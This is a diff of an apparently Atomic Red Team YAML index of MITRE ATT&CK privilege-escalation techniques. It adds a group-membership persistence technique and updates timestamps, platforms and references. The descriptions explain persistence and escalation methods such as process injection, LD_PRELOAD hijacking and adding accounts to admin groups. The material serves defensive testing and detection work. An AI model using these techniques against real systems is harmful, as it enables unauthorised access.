       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.003:
     technique:
@@ -19373,7 +19710,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19421,8 +19758,6 @@ privilege-escalation:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1546.011:
@@ -19454,7 +19789,7 @@ privilege-escalation:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -19509,13 +19844,11 @@ privilege-escalation:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -19576,9 +19909,9 @@ privilege-escalation:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -19587,7 +19920,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -19640,7 +19972,7 @@ privilege-escalation:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -19661,7 +19993,6 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests:
     - name: Logon Scripts - Mac
@@ -19682,7 +20013,7 @@ privilege-escalation:
         name: manual
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -19785,7 +20116,6 @@ privilege-escalation:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1611:
@@ -19885,12 +20215,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1611
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -19903,7 +20232,6 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -19916,7 +20244,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -19946,7 +20273,8 @@ privilege-escalation:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1547.005:
@@ -19973,7 +20301,7 @@ privilege-escalation:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -19999,13 +20327,11 @@ privilege-escalation:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -20082,7 +20408,6 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests:
     - name: Launch Daemon
@@ -20168,7 +20493,7 @@ privilege-escalation:
           sudo rm /tmp/T1543_004_atomicredteam.txt
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -20187,6 +20512,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -20194,7 +20520,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -20214,34 +20539,36 @@ privilege-escalation:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -20277,6 +20604,10 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -20288,16 +20619,12 @@ privilege-escalation:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -20333,12 +20660,12 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -20346,14 +20673,13 @@ privilege-escalation:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -20368,6 +20694,7 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -20376,18 +20703,18 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -20419,9 +20746,6 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests:
     - name: Enable Guest Account on macOS
@@ -20504,7 +20828,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -20531,7 +20854,7 @@ privilege-escalation:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -20557,8 +20880,6 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests:
     - name: Trap EXIT
@@ -20597,7 +20918,7 @@ privilege-escalation:
         name: sh
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -20718,7 +21039,6 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests:
     - name: Dylib Injection via DYLD_INSERT_LIBRARIES
@@ -20764,7 +21084,7 @@ privilege-escalation:
         elevation_required: false
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -20796,11 +21116,10 @@ privilege-escalation:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -20841,11 +21160,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -20901,12 +21219,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -20963,7 +21280,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests:
     - name: Make and modify binary from C source
@@ -21106,7 +21422,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -21216,7 +21531,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests:
     - name: Modify SSH Authorized Keys
@@ -21289,7 +21603,7 @@ privilege-escalation:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -21322,13 +21636,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -21390,10 +21702,9 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -21451,7 +21762,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -21493,7 +21803,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -21552,8 +21862,6 @@ privilege-escalation:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.005:
     technique:
@@ -21583,7 +21891,7 @@ privilege-escalation:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -21618,12 +21926,10 @@ privilege-escalation:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -21700,7 +22006,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1055.004:
@@ -21739,7 +22044,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -21788,8 +22093,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1546.009:
@@ -21821,7 +22124,7 @@ privilege-escalation:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
